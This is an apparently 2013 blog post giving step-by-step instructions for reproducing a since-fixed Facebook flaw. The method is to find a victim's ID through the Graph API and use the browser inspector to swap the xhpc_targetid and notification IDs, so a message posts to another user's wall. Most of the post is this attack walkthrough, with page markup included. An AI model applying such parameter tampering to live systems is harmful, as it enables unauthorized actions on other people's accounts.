06/09/2013 18:49
Mark Zuckerberg's Facebook wall 'hacked'
Here are the Technical details of "Khalil's Bug" that allowed him to breach the privacy of any user to post on anyone's wall.
I found how it worked within 30 minutes after the news became public but posting it now.
Step1:
Go to your own wall and write the message that you want to be posted on your victim's wall.
Step2:
Go to your victims wall and find his facebook ID no.
( https://graph.facebook.com/victims-username ) and copy his facebook ID
{
"id": "10000020821XXXX",
"name": " .................... ",
"first_name": ".........",
"last_name": ".............",
"link": "https://www.facebook.com/..........",
"username": "...........",
"gender": "male",
"locale": "en_US"
}
Step3:
Right Click on the Post Button of your wall where you typed the message that you wanted to be posted on your victims wall and click on "Inspect Element" feature of google chrome. (Can be done using Mozilla Firefox too)
Step4:
Now the final and most important thing,We need to change all the ID attributes of the composer.php and replace it with your victims facebook ID no. that is xhpc_targetid attribute with value of your victims ID (Replace your ID with victims ID here
Step5:
Now search for fbnotificationsLIST-
You will find 2 lines-
Go to this one-
bigPipe.onPageletArrive({"content": {"fbNotificationsList_wrapper": {"container_id":"u_0_3c"}},"jsmods": {"require":[["NotificationXOut","setupCancelListener",["m_0_3a"],[{"__m":"m_0_3a"},victimsID_here]],["NotificationXOut","setupCancelListener",["m_0_3c"],[{"__m":"m_0_3c"},135045834]],["NotificationXOut","setupCancelListener",["m_0_3e"],[{"__m":"m_0_3e"},135043265]],["NotificationXOut","setupCancelListener",["m_0_3g"],[{"__m":"m_0_3g"},135040917]]],"elements": [["m_0_3b","u_0_2e",2],["m_0_3e","u_0_29",2],["m_0_3f","u_0_2g",2],["m_0_3h","u_0_2h",2],["m_0_3a","u_0_23",2],["m_0_3c","u_0_26",2],["m_0_3g","u_0_2c",2],["m_0_3d","u_0_2f",2]]},"css""P8sYO","OoJIY","zpUsI"],"bootloadable":{},"resource_map": {"zpUsI":{"type":"css","crossOrigin":1,"src":"https:\/\/fbstatic-a.akamaihd.net\/rsrc.php\/v2\/y4\/r\/16yGUeAISb3.css"}},"js""YNoHr","Uon2R","M\/U6d","ic9Fd"],"onload""window.presenceNotifications && presenceNotifications.fromDom()"],"id":"fbNotificationsList_wrapper","phase":2})
and replace your ID with victims ID.
Step6:
Now search for globalcontainer attribute,go to this line-
<input type="hidden" autocomplete="off" name="xhpc_targetid" value="victimID_here">
replace your id with victims id.
Step7:
Now just find all the "Xhpc_targetid" attribute and change the value to victims id no.
Step8:
Now just click on POST (on your wall where you typed the message that you wanted to be posted on victim's wall.
# This bug has already been fixed so facebook so now Facebook will show "This message could not be pasted on this wall" but in Khalil's case this bug was unfixed so he was successfully able to post the message on anyone's wall including the great "Mark Zukerberg"
Summary:
Find Victims ID using the graph feature of Facebook.
Change all xhpc_targetid attribute values to victims id.
Change fbnotifications attribute with victims id.
